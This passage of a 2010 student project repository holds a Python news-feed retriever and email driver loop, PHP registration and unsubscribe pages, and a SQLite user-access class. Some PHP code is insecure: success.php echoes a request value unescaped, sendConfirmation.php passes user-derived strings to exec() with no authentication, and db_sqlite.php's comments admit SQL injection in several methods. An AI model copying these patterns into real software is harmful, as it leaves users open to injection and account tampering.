list\n\t\t\t\t\tlist_title.append(p_story[2][iteration][:240])\n\t\t\t\t\tlist_content.append(p_story[3][iteration][:240])\n\t\t\t\t\tlist_category.append(p_story[4][iteration][:240])\n\t\t\t\t\tlist_URL.append(p_story[5][iteration][:240])\n\t\t\t\t\tlist_ts.append(p_story[6][iteration])\n\n\t\t\t\t\tprint 'HERE I ADD TO DB: ----------------'\n\n\t\t\t\t# Add entry to DB\n\t\t\t\tprint p_story[2][iteration][:240], ' ||| ' , p_story[3][iteration][:240], ' ||| ' , p_story[5][iteration][:240], ' ||| ' , str(p_story[6][iteration])\n\t\t\t\tprint '-------------------------------------'\n\t\t\t\tcursor3.execute (\"\"\"\n\t\t\t\t\tINSERT INTO feed_stories (title, content, url, time_stamp, sid, gid)\n\t\t\t\t\tVALUES (%s, %s, %s, %s, %s, %s)\n\t\t\t\t\tON DUPLICATE KEY UPDATE fid=fid+1;\n\t\t\t\t\t\"\"\", (p_story[2][iteration][:240], p_story[3][iteration][:240], p_story[5][iteration][:240], int(p_story[6][iteration]), mysid, 1))\n\t\t\t\tsys.stdout.flush()\n\n\t\t\t# make a final story out of the lists\n\t\t\tprocessed_story = []\n\t\t\t# CONSISTENCY CHECK\n\t\t\tcon1 = len(list_title)\n\t\t\tcon2 = len(list_content)\n\t\t\tcon3 = len(list_category)\n\t\t\tcon4 = len(list_URL)\n\t\t\tcon5 = len(list_ts)\n\t\t\tif ((con1 != con2) or (con1 != con3) or (con1 != con4) or (con1 != con5)):\n\t\t\t\tprint 'CONSISTENCY CHECK FAILED IN ATOM STORY '\n\t\t\t\tprint 'STORY IS:'\n\t\t\t\tprint str(story)\n\t\t\t\tprint '\\n'\n\t\t\tif (len(list_ts) > 0):\n\t\t\t\tprocessed_story = [p_story[0][:240], p_story[1][:240], list_title, list_content, list_category, list_URL, list_ts]\n\t\t\t\tprocessed_stories.append(processed_story)\n\n\tcursor_chkexist.close ()\n\tcursor3.close ()\n\tcursor2.close ()\n\tconn.commit ()\n\tconn.close ()\n\t\t\n\t# return processed stories list\n\t# LC DEBUG\n\t# print processed_stories\n\treturn processed_stories\n\nif __name__ == \"__main__\":\n\tUpdateFeed()\n\n\n# Copyright information\n\"\"\"\nAuthors: CS 130 Watercooler Content Distribution Engine Team\nCopyright (c) 2010, CS 130 Watercooler Content Distribution Engine Team\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'\nAND ANY EXPRESS OR IMPLIED 
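One caution on the final consistency check in UpdateFeed: its failure branch prints str(story), but no story variable exists in that scope (the lists are assembled into processed_story just below), so a failed check would itself raise a NameError. The repeated [:240] clamping when building rows is also easy to centralize; a hypothetical sketch, with field positions and column order taken from the INSERT above:

def story_row(p_story, i, sid, gid=1):
    """Build one (title, content, url, time_stamp, sid, gid) tuple,
    clamping text fields to the 240-character width used throughout."""
    return (p_story[2][i][:240], p_story[3][i][:240],
            p_story[5][i][:240], int(p_story[6][i]), sid, gid)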
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\nSUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\"\"\"\nfeedparser module (Universal Feed Parser)\nCopyright (c) 2002-2005, Mark Pilgrim\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\nSUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n" }, { "alpha_fraction": 0.618354320526123, "alphanum_fraction": 0.6300463080406189, "avg_line_length": 30.625898361206055, "blob_id": "09c1a76bc471ed11fdd08eae0ed69a772bd6b8dd", "content_id": "fba17d77ca8d7d627c1d460a6f6a2ba0f928de52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4533, "license_type": "no_license", "max_line_length": 104, "num_lines": 139, "path": "/driverfork.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\r\n\"\"\"\r\nVersion LOG\r\n\r\n1.0:\r\nJust a basic version including feed retriever\r\n\r\n2.0:\r\nA Looping functional driver \r\n\r\n2.1:\r\nAdding driver log to facilitate debug\r\n\r\n2.2:\r\nAdded more debug output\r\n\r\n\"\"\"\r\nglobal debug\r\ndebug = False\r\nlogs = True\r\nimport FeedRetriever\r\nimport EmailServer\r\nimport time\r\n\r\ndef Driver():\r\n\t# a driver to debug\r\n\tif (logs):\r\n\t\tdriverlog = open(\"DRIVERLOG.txt\", mode ='w')\r\n\t\tstorylog = open(\"STORYLOG.txt\", mode ='w')\r\n\r\n\t# a loop to call all backend functions\r\n\twhile (True):\r\n\t\t# gather new feeds entries\r\n\t\tstories = FeedRetriever.UpdateFeed()\r\n\r\n\t\t\"\"\" DEPRECATED WITH NEW DEFINITION\r\n\t\tif (debug):\r\n\t\t\t# current debug/testing purpose\r\n\t\t\tprint 'story is [Feed Title, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]'\r\n\t\t\tfor index, story in enumerate(stories):\r\n\t\t\t\tprint 
'Story', index, ':'\r\n\t\t\t\tfor item in range(len(story)):\r\n\t\t\t\t\tif (item <= 4):\r\n\t\t\t\t\t\tif ((item == 2) and (len(story[item]) > 100)):\r\n\t\t\t\t\t\t\tprint 'Item', item , ':', story[item][:100], '...'\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tprint 'Item', item , ':', story[item]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint 'Item', item , ':', story[item]\r\n\t\t\t\tprint ''\r\n\t\t\"\"\"\r\n\t\tif (logs):\r\n\t\t\tstorylog.write(str(stories))\r\n\t\t\tstorylog.write('\\n\\n')\r\n\t\t# for testing, only get first four stories, and trim the \r\n\t\tcutted_stories = []\r\n\t\tlimiter = 0\r\n\t\tfor story in stories:\r\n\t\t\tif limiter < 1000:\r\n\t\t\t\tcutted_story = []\r\n\t\t\t\tcutted_story.append(story[1])\r\n\t\t\t\tcutted_story.append(story[5])\r\n\t\t\t\tcutted_story.append(story[2])\r\n\t\t\t\tcutted_story.append(story[3])\r\n\t\t\t\tcutted_stories.append(cutted_story)\r\n\t\t\t\tlimiter = limiter + 1\r\n\t\t\tif ((limiter % 10) == 0):\r\n\t\t\t\t# call tim's function\r\n\t\t\t\t# special code to delay Tim's code to avoid bombing, to facilitate testing\r\n\t\t\t\tprint ' -------------------------------------- '\r\n\t\t\t\tprint 'Here is 10 story passed to email server'\r\n\t\t\t\tprint ' -------------------------------------- '\r\n\t\t\t\tif (logs):\r\n\t\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\t\tdriverlog.write('Here is 10 story passed to email server\\n')\r\n\t\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\t\tdriverlog.write(str(cutted_stories))\r\n\t\t\t\t\tdriverlog.write('\\n')\r\n\t\t\t\t\tdriverlog.flush()\r\n\r\n\t\t\t\tEmailServer.sendStories(cutted_stories)\r\n\t\t\t\ttime.sleep(60)\r\n\t\t\t\tcutted_stories = []\r\n\t\tprint ' ------------------------------------------ '\r\n\t\tprint 'Here is remaining ', str(limiter % 10), ' story passed to email server'\r\n\t\tprint ' ------------------------------------------ '\r\n\t\tif (logs):\r\n\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\tdriverlog.write('Here is remaining ' + str(limiter % 10) + ' story passed to email server\\n')\r\n\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\tdriverlog.write(str(cutted_stories))\r\n\t\t\t\tdriverlog.write('\\n')\r\n\t\t\t\tdriverlog.flush()\r\n\t\tEmailServer.sendStories(cutted_stories)\r\n\t\ttime.sleep(60)\r\n\t\tcutted_stories = []\r\n\t\t# print cutted_stories\r\n\tif (logs):\r\n\t\tdriverlog.close()\r\n\t\tstorylog.close()\r\n\r\n\treturn\r\n\r\nif __name__ == \"__main__\":\r\n\tDriver()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Copyright information\r\n\"\"\"\r\nAuthors: CS 130 Watercooler Content Distribution Engine Team\r\nCopyright (c) 2010, CS 130 Watercooler Content Distribution Engine Team\r\nAll rights reserved.\r\n\r\nRedistribution and use in source and binary forms, with or without modification,\r\nare permitted provided that the following conditions are met:\r\n\r\n* Redistributions of source code must retain the above copyright notice,\r\n this list of conditions and the following disclaimer.\r\n* Redistributions in binary form must reproduce the above copyright notice,\r\n this list of conditions and the following disclaimer in the documentation\r\n and/or other materials provided with the distribution.\r\n\r\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'\r\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
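The modulo-counter batching above (flush every tenth story to EmailServer, then flush the remainder after the loop) is the standard chunking pattern, which a generator expresses without the two separate flush sites. A sketch (batches is a hypothetical helper):

def batches(items, size=10):
    """Yield successive size-limited slices of a list."""
    for start in range(0, len(items), size):
        yield items[start:start + size]

Iterating for batch in batches(cutted_stories) and calling EmailServer.sendStories(batch) followed by time.sleep(60) per batch then covers both the full groups and the trailing partial one.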
PURPOSE\r\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\r\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\r\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\r\nSUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\r\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\r\nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\r\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\nPOSSIBILITY OF SUCH DAMAGE.\r\n\"\"\"" }, { "alpha_fraction": 0.6500682234764099, "alphanum_fraction": 0.6637107729911804, "avg_line_length": 44.8125, "blob_id": "4fbaea85b9cd892ba52d2fb6454a3898d874fd74", "content_id": "c0c2102612443935f87901afddf2c7cb95fbe3c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 259, "num_lines": 32, "path": "/www/trunk/success.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\nfunction format($cell)\n{\n $retval = '(' . substr($cell,0,3) . ') ' . substr($cell,3,3) . '-' . substr($cell,6,4); \n return $retval;\n}\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n <div id=\"logo\">\n <fieldset style=\"width:22em;\"><legend>Registration Successful</legend>\n <p style=\"color:navy;\">A confirmation email has been sent to <?= $_REQUEST['email'] ?>. Please follow the link in the email to activate your Watercooler account.</p>\n <p style=\"color:navy;\">In addition, a confirmation text message has been sent to <?php echo format($_REQUEST['cell']) ?>. 
Enter the pin number in the subject of the text message into the corresponding field in your settings page to activate sms alerts.</p>\n\t<p><a href=\"index.php\">Return to the Watercooler homepage</a></p>\n </fieldset>\n </div>\n </body>\n</html>\n" }, { "alpha_fraction": 0.5860214829444885, "alphanum_fraction": 0.5860214829444885, "avg_line_length": 19.72222137451172, "blob_id": "dd5403530b8bc7985c815f5837a661efaeb066c0", "content_id": "53d2007900fbec064bd5dd8728c2fae17e8178ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 372, "license_type": "no_license", "max_line_length": 65, "num_lines": 18, "path": "/www/trunk/unsubscribe.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('auth.php');\n\nif (isset($_REQUEST['confirm'])) {\n if (isset($user)) {\n $user->delete();\n?>\nuser deleted <a href=\".\">home</a>\n<?php\n }\n} else {\n?>\n<form action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" method=\"POST\">\n <label>Are you sure you want to DELETE your account??</label>\n <input type=\"submit\" name=\"confirm\" value=\"YES\" />\n</form>\n<?php\n}" }, { "alpha_fraction": 0.6433260440826416, "alphanum_fraction": 0.6477023959159851, "avg_line_length": 40.54545593261719, "blob_id": "818e94e50415e309735d36f4449b780d88669286", "content_id": "375b32a28965bf0ada7a46b8a72c410d0843fa87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 457, "license_type": "no_license", "max_line_length": 162, "num_lines": 11, "path": "/www/trunk/sendConfirmation.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('common.php');\nrequire_once('db_init.php');\n\n// XXX add authentication to this\n$user = User::find('id', $_REQUEST['id']);\nif ($user !== NULL && !$user->email_confirmed) {\n $hyperlink = 'confirm.php' . \"?id={$user->id}&pin={$user->email_pin}\";\n $confirmationString = \"python2.5 -c \\\"import EmailServer; EmailServer.sendConfirmEmail('{$page_uri_base}{$hyperlink}','{$user->username}','{$user->email}');\\\"\";\n exec($confirmationString);\n}\n" }, { "alpha_fraction": 0.648307204246521, "alphanum_fraction": 0.6506248712539673, "avg_line_length": 34.83876037597656, "blob_id": "19c8d56c20639636a5df0d02fb3f7d489b7d0941", "content_id": "2a198e00297901d435fa9686ffdfd0e9c996ca9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 22005, "license_type": "no_license", "max_line_length": 80, "num_lines": 614, "path": "/www/trunk/db_sqlite.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\n\n/* class SQLiteDBObject provides a base class for all classes which\n represent objects in a SQLite database\n*/\nclass SQLiteDBObject extends DatabaseObject {\n /* $pdo is defined here so sibling classes to SQLiteDB can access its\n PDO and thus perform low-level operations on a given SQLite database */\n protected $pdo;\n\n /* $userattrs_to_cols is an associative array mapping attribute names given \n as a parameter to methods in classes derived from this one to column\n names in the SQLite database. 
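sendConfirmation.php above bridges into the Python mailer by shelling out to a python2.5 one-liner. On the Python side the exec amounts to a direct call into EmailServer (defined later in this listing); a usage sketch with hypothetical placeholder values for the link, username, and address:

import EmailServer

# Equivalent of the PHP exec() above; the hyperlink is built from
# page_uri_base plus confirm.php?id=...&pin=... in the PHP caller.
EmailServer.sendConfirmEmail(
    'http://example.invalid/confirm.php?id=42&pin=1234',  # hypothetical
    'testuser',                                           # hypothetical
    '[email protected]')                                 # hypothetical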
Note that the following attributes are \n missing and require special handling\n 'carrier': column 'cid' needs to be looked up in 'carriors' table by\n 'carrior_name' and entered in user table under column 'cid' */\n protected static $userattrs_to_cols = \n array('username'=>'username',\n\t 'email'=>'email',\n\t 'password'=>'password',\n\t 'phone_number'=>'phone_number');\n}\n\n/* class SQLiteDB implements iDatabase on SQLite databases (see\n corresponding documentation)\n*/\nclass SQLiteDB extends SQLiteDBObject implements iDatabase {\n/* string SQLiteDB::cfg_ini_main_section is the name of the section in \n the ini config files passed to SQLiteDB::connectFromIni containing the\n main connection parameters. This is also the base prefix for the opts ini \n section which is named SQLiteDB::cfg_ini_main_section.' opts'.\n*/\n const cfg_ini_main_section = __CLASS__;\n\n/* function SQLiteDB::__construct is the constructor for the class\n\n $pdo: (PDO object) a valid PDO object connected to the SQLite database to \n use\n*/\n private function __construct(PDO $pdo) {\n $this->pdo = $pdo;\n }\n\n/* function SQLiteDB::setAsSiteDefault implements \n iDatabase::setAsSiteDefault (see corresponding documentation)\n*/\n public function setAsSiteDefault() {\n self::$site_db = $this;\n }\n\n/* function SQLiteDB::connect implements iDatabase::connect (see \n corresponding documentation)\n\n $cfg_vars: (array) the configuration variables for the database connection,\n encoded in the following key-value pairs:\n\t 'filename': (string) the absolute path to the file which contains\n\t the SQLite database (required)\n\t 'opts': (array) an associative array of PDO connection options,\n\t or NULL for PHP defaults (see PHP Manual documentation for PDO\n\t\tand the PDO SQLite driver)\n\n returns a SQLiteDB object connected to the database\n*/\n public static function connect(array $cfg_vars) {\n if (!isset($cfg_vars['filename']))\n\tthrow new InvalidArgumentException('filename is a required key-value '.\n\t\t\t\t\t 'pair in parameter $cfg_vars');\n\n // construct dsn string\n $dsn = 'sqlite:'.$cfg_vars['filename'];\n\n // create PDO object\n $pdo = new PDO($dsn, NULL, NULL, $cfg_vars['opts']);\n\n // set PDO error mode so that we get exceptions instead of PHP errors\n $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n\n $c = __CLASS__;\n $db = new $c($pdo);\n\n return $db;\n }\n\n/* function SQLiteDB::connectFromIni implements iDatabase::connectFromIni\n (see corresponding documentation)\n\n $cfg_file: (string) the ini file to read connection configuration variables\n from, encoded in the var-value pairs listed in the documentation\n\t for SQLiteDB::connect, split into the following sections:\n\t Section 'SQLiteDB' contains\n\t 'username', 'password', 'host', 'port', 'dbname'\n\t Section 'SQLiteDB opts' contains\n\t the PDO connection options, encoded in var-value pairs with the\n\t\tvariable names being names of PDO constants, and the values\n\t\tbeing the desired corresponding values for the options. 
Note\n\t\tthat values MUST be single quoted to avoid values from being\n\t\tinterpreted by PHP (see PHP Manual documentation for PDO and\n\t\tthe PDO SQLite driver for PDO connection options).\n\n returns a SQLiteDB object connected to the database\n*/\n public static function connectFromIni($cfg_file) {\n $cfg = @parse_ini_file($cfg_file, TRUE);\n if ($cfg === FALSE) {\n $e = error_get_last();\n throw new ErrorException($e['message'], 0, $e['type'], \n\t\t\t $e['file'], $e['line']);\n }\n\n $cfg_vars = $cfg[self::cfg_ini_main_section];\n\n // parse PDO options\n if (isset($cfg[self::cfg_ini_main_section.' opts']))\n foreach ($cfg[self::cfg_ini_main_section.' opts'] as $key=>$value)\n\t$cfg_vars['opts'][constant($key)] = $value;\n\n return self::connect($cfg_vars);\n }\n}\n\n/* class SQLiteUsers implements iUsers on SQLite databases (see corresponding \n documentation)\n*/\nclass SQLiteUsers extends SQLiteDBObject implements iUsers {\n private $db;\n public $users;\n\n private function __construct(array $users, SQLiteDB $db) {\n $this->users = $users;\n $this->db = $db;\n }\n\n private static function __search($userinfo, $op, SQLiteDB $db) {\n static $carrier_attr = 'carrier';\n\n // build SQL query to use to search for users\n $search_sql = 'SELECT uid FROM users WHERE ';\n foreach ($userinfo as $attr=>$values) {\n foreach ((array) $values as $key=>$value) {\n\tif (isset(self::$userattrs_to_cols[$attr]))\n\t $search_sql .= \n\t self::$userattrs_to_cols[$attr].\"=? $op \";\n\telseif($attr === $carrier_attr)\n\t $search_sql .= \n\t \"cid=(SELECT cid FROM carriors WHERE carrior_name=?) $op \";\n }\n }\n // remove trailing op and spaces\n $search_sql = substr($search_sql, 0, -(strlen($op) + 2));\n // add rest of SQL query\n $search_sql .= ';';\n\n // prepare SQL statement\n $search_stmt = $db->pdo->prepare($search_sql);\n\n // create array of column value bindings\n foreach ($userinfo as $attr=>$values)\n foreach ((array) $values as $key=>$value)\n\tif (isset(self::$userattrs_to_cols[$attr]) || $attr === $carrier_attr)\n\t $search_binds[] = $value;\n\n $search_stmt->execute($search_binds);\n // set fetch mode to create instances of SQLiteUser\n $search_stmt->setFetchMode(PDO::FETCH_CLASS, 'SQLiteUser', array($db));\n\n // fetch the result and create a new instance of this class\n $search_result = $search_stmt->fetchAll();\n if ($search_result !== FALSE) {\n $c = __CLASS__;\n return new $c($search_result, $db);\n } else\n return NULL;\n }\n\n/* SQLiteUsers::searchAll implements iUsers::searchAll (see corresponding\n documentation). This function is safe to SQL injection.\n*/\n public static function searchAll($userinfo, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAll($userinfo, $db);\n }\n /* SQLiteUsers::__searchAll is a helper function to SQLiteUsers::searchAll \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAll($userinfo, SQLiteDB $db) {\n return self::__search($userinfo, 'AND', $db);\n }\n\n/* SQLiteUsers::searchAny implements iUsers::searchAny (see corresponding\n documentation). This function is safe to SQL injection.\n*/\n public static function searchAny($userinfo, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAny($userinfo, $db);\n }\n /* SQLiteUsers::__searchAny is a helper function to SQLiteUsers::searchAny \n which performs the actual search operation. 
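__search above assembles 'col=? OP col=? ...' by appending each clause and then trimming the trailing operator with substr; joining ready-made placeholder clauses yields the same SQL without the trim step. A sketch of the pattern against Python's sqlite3, assuming the column names are already whitelisted (only the names are interpolated; values are always bound):

def search_uids(conn, userinfo, op='AND'):
    """SELECT uid FROM users WHERE col=? OP col=? ... and fetch the ids.

    conn is an open sqlite3.Connection; userinfo maps trusted column
    names to the values to match.
    """
    where = (' %s ' % op).join('%s=?' % col for col in userinfo)
    cursor = conn.execute(
        'SELECT uid FROM users WHERE %s;' % where, tuple(userinfo.values()))
    return [row[0] for row in cursor.fetchall()]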
This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAny($userinfo, SQLiteDB $db) {\n return self::__search($userinfo, 'OR', $db);\n }\n\n/* SQLiteUsers::merge implements iUsers::merge (see corresponding \n documentation).\n*/\n public function merge($users) {\n return self::__merge($users);\n }\n /* SQLiteUsers::__merge is a helper function to SQLiteUsers::merge which\n performs the actual merge operation. This function was added in order to\n use typehinting on parameter $users.\n */\n public function __merge(SQLiteUsers $users) {\n if ($this->db !== $users->db)\n throw new InvalidArgumentException('$db must match between objects');\n $c = __CLASS__;\n return new $c(array_merge($this->users, $users->users), $this->db);\n }\n}\n\n/* class SQLiteUser implements iUser on SQLite databases (see corresponding \n documentation)\n*/\nclass SQLiteUser extends SQLiteDBObject implements iUser {\n /* $db is the database which contains this user */\n private $db;\n /* $uid is the unique user identifier which is used to access user \n information in the database */\n private $uid;\n\n /* function SQLiteDB::__construct is the constructor for the class\n\n $db: (SQLiteDB object) a valid SQLiteDB object connected to the SQLite\n database to use\n */\n private function __construct(SQLiteDB $db) {\n $this->db = $db;\n }\n\n /* function SQLiteDB::__get is the PHP magic 'get' function for the class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* function SQLiteDB::__set is the PHP magic 'set' function for the class */\n public function __set($name, $value) {\n $this->set(array($name=>$value));\n }\n\n /* parseUserInfo transforms a $userinfo array, in the format taken by many\n iUser functions, into an associative array with keys as database column\n names\n */\n private static function parseUserInfo($userinfo, SQLiteDB $db) {\n static $userinfo_to_cols = \n array('username'=>'username', 'password'=>'password', 'email'=>'email', \n\t 'phone_number'=>'phone_number');\n\n // rename the userinfo keys as database column names\n foreach ($userinfo as $key=>$value)\n if ($userinfo_to_cols[$key] !== NULL)\n\t$db_userinfo[$userinfo_to_cols[$key]] = $value;\n\n // XXX fake unused database fields for now\n $db_userinfo['status'] = 1;\n\n return $db_userinfo;\n }\n\n/* SQLiteUser::find implements iUser::find (see corresponding documentation).\n This function IS vulnerable to SQL injection in parameter $attr.\n*/\n public static function find($attr, $value, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* SQLiteUser::__find is a helper function to SQLiteUser::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, SQLiteDB $db) {\n $find_sql = \"SELECT uid FROM users WHERE $attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? 
$find_result : NULL;\n }\n\n/* SQLiteUser::set implements iUser::set (see corresponding documentation).\n This function IS vulnerable to SQL injection in keys to array parameter \n $userinfo.\n*/\n public function set($userinfo) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $this->db);\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array();\n if (isset($userinfo['carrier']))\n $carrier_bind['carrior_name'] = $userinfo['carrier'];\n\n // build the SQL query to use to update the user\n $update_sql = 'UPDATE users SET ';\n // add column names and values\n foreach ($db_userinfo as $col=>$value)\n $update_sql .= $col.'=:'.$col.', ';\n // add carrier name and value\n if (isset($userinfo['carrier']))\n $update_sql .= $carrier_col.'='.$carrier_sql.', ';\n // remove trailing comma and space\n $update_sql = substr($update_sql, 0, -2);\n // add rest of UPDATE statment\n $update_sql .= ' WHERE uid=:uid;';\n\n // prepare the SQL statement\n $update_stmt = $this->db->pdo->prepare($update_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n $update_stmt->bindValue(':'.$col, $value);\n // bind uid\n $update_stmt->bindParam(':uid', $this->uid);\n \n // execute the SQL statement\n $update_stmt->execute();\n }\n\n/* SQLiteUser::get implements iUser::get (see corresponding documentation).\n This function IS vulnerable to SQL injection in parameter $userattr.\n*/\n public function get($userattrs) {\n static $carrier_attr = 'carrier';\n static $carrier_sql = '(SELECT carrior_name FROM carriors WHERE\n cid=(SELECT cid FROM users WHERE uid=:uid2))';\n\n // build SQL query to use to get user attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($userattrs as $key=>$attr) {\n if (isset(self::$userattrs_to_cols[$attr]))\n\t$get_sql .= self::$userattrs_to_cols[$attr].\" AS $attr, \";\n elseif ($attr === $carrier_attr)\n\t$get_sql .= \"$carrier_sql AS $attr, \";\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM users WHERE uid=:uid;';\n\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':uid', $this->uid);\n\n // bind carrier specific column values\n if (in_array('carrier', $userattrs))\n $get_stmt->bindParam(':uid2', $this->uid);\n \n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n throw new Exception('PDOStatement::fetch failed');\n return $get_result;\n }\n\n/* SQLiteUser::create implements iUser::create (see corresponding \n documentation)\n*/\n public static function create($userinfo, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($userinfo, $db);\n }\n\n /* SQLiteUser::__create is a helper function to SQLiteUser::create which\n performs the actual create operation. 
